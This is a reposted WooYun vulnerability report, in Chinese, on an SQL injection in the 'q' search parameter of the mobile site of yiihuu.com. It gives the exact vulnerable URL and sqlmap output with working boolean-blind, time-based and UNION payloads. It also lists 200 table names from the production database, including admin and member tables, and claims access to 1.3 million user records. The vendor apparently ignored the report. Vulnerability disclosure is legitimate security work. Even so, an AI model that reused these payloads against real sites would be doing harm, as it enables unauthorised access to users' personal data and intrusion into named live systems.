翼虎网某处SQL注射漏洞可UNION(130万用户信息)

admin
admin
admin
140984
文章
117
评论
2017年4月21日22:31:18评论388 views字数 226阅读0分45秒阅读模式
摘要

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-13: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2016-194066

漏洞标题: 翼虎网某处SQL注射漏洞可UNION(130万用户信息)

相关厂商: yiihuu.com

漏洞作者: 路人甲

提交时间: 2016-04-08 21:54

公开时间: 2016-04-13 22:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 11

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域 
http://m.yiihuu.com/zyxz/?q=1

翼虎网某处SQL注射漏洞可UNION(130万用户信息)

code 区域 
sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: q (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: q=1%' AND 8567=8567 AND '%'='
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: q=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))qAgp) AND '%'='
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 10 columns
     Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x587a634b76514a4a6c64,0x71716b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
 ---
 back-end DBMS: MySQL >= 5.0.0
 Database: yiihuu_db
 [200 tables]
 +-------------------------+
 | 360_token               |
 | activity                |
 | admin                   |
 | admin_role              |
 | admin_role_relative     |
 | advertisement           |
 | album                   |
 | album_chapter           |
 | album_copy              |
 | album_copy_chapter      |
 | album_count             |
 | album_extend            |
 | album_project           |
 | album_rank_month        |
 | album_rank_week         |
 | album_video             |
 | ask                     |
 | ask_answer              |
 | ask_content             |
 | ask_zan                 |
 | attention               |
 | baidu_push              |
 | book                    |
 | book_art_tag            |
 | book_article            |
 | book_article_ext        |
 | book_article_temp       |
 | book_tag                |
 | business_course         |
 | business_order          |
 | card_study              |
 | chips                   |
 | chips_courses           |
 | comment                 |
 | comment_att             |
 | comment_content         |
 | comment_goodlog         |
 | comment_reply           |
 | courses                 |
 | courses_attachment      |
 | courses_count           |
 | courses_extend          |
 | courses_homework        |
 | courses_homework_attr   |
 | courses_homework_topic  |
 | courses_info            |
 | courses_learn_progress  |
 | courses_live            |
 | courses_live_need       |
 | courses_manage_progress |
 | courses_notice          |
 | courses_payback         |
 | courses_plan            |
 | courses_progress        |
 | courses_push            |
 | courses_qa              |
 | courses_qa_fav          |
 | courses_repay           |
 | courses_section         |
 | courses_step            |
 | courses_step_homework   |
 | courses_student_test    |
 | courses_student_work    |
 | courses_task            |
 | courses_task_comp       |
 | courses_test_ext        |
 | courses_video           |
 | courses_video_attr      |
 | coursesapply            |
 | courseslist             |
 | download                |
 | download_class          |
 | download_count          |
 | download_ext            |
 | download_log            |
 | edu_apply               |
 | email_count             |
 | error_reason            |
 | event_0410              |
 | event_0421              |
 | event_0509              |
 | event_bless             |
 | event_cj                |
 | event_gift              |
 | event_gift_list         |
 | event_jyj               |
 | event_jyj_ly            |
 | event_lhb               |
 | event_lhb_extend        |
 | event_org               |
 | event_org_votelist      |
 | event_prize             |
 | event_school_msg        |
 | event_tejia             |
 | event_vip_wjdc          |
 | event_wx_hubi           |
 | event_wx_lhb            |
 | event_wx_menucount      |
 | exp_get                 |
 | exp_op                  |
 | fanc                    |
 | favorites               |
 | filter_keyword          |
 | help                    |
 | idear                   |
 | idear_class             |
 | idear_count             |
 | idear_downloadlog       |
 | idear_ext               |
 | idear_focus             |
 | idear_sign              |
 | idearset                |
 | idearset_count          |
 | image_content           |
 | image_count             |
 | index_show              |
 | mail_auth               |
 | mail_notify             |
 | member                  |
 | member_bind             |
 | member_bind_token       |
 | member_extend           |
 | member_filter           |
 | member_log              |
 | member_login_record     |
 | member_message          |
 | member_other            |
 | message                 |
 | message_push            |
 | meta_custom             |
 | news                    |
 | news_class              |
 | news_ext                |
 | prize                   |
 | prize_recode            |
 | push_action             |
 | push_content            |
 | push_msg_qq             |
 | quan                    |
 | quan_ext                |
 | questions               |
 | questions_class         |
 | questions_count         |
 | questions_ext           |
 | questions_replay        |
 | questions_replay_ext    |
 | say                     |
 | say_content             |
 | say_count               |
 | say_log                 |
 | search_syn              |
 | search_word             |
 | send_mail               |
 | share                   |
 | sign                    |
 | sign_extend             |
 | sort_exp                |
 | sort_level              |
 | sort_log                |
 | sort_theme              |
 | sort_theme_2            |
 | sort_tool               |
 | sort_tool_industry      |
 | space_focusimg          |
 | space_friendlink        |
 | space_group             |
 | space_member_info       |
 | space_org_news          |
 | space_view              |
 | study                   |
 | subject                 |
 | subject_column          |
 | subject_soft_content    |
 | subscribe               |
 | sucai                   |
 | sucai_class             |
 | sucai_count             |
 | sucai_downloadlog       |
 | sucai_ext               |
 | sucai_focus             |
 | sucai_sign              |
 | sucaiset                |
 | sucaiset_count          |
 | sys_message             |
 | task                    |
 | task_member             |
 | task_verify_ip          |
 | tbl_session             |
 | video                   |
 | video_bigpic            |
 | video_content           |
 | video_count             |
 | words                   |
 | words_rank_month        |
 | words_rank_week         |
 | wordsset                |
 | wordsset_count          |
 | wordsset_extend         |
 | wordsset_list           |
 | wx_keyword              |
 +-------------------------+

130万用户信息:

翼虎网某处SQL注射漏洞可UNION(130万用户信息)

翼虎网某处SQL注射漏洞可UNION(130万用户信息)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-13 22:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-13 23:26 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    1

    无影响厂商忽略

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin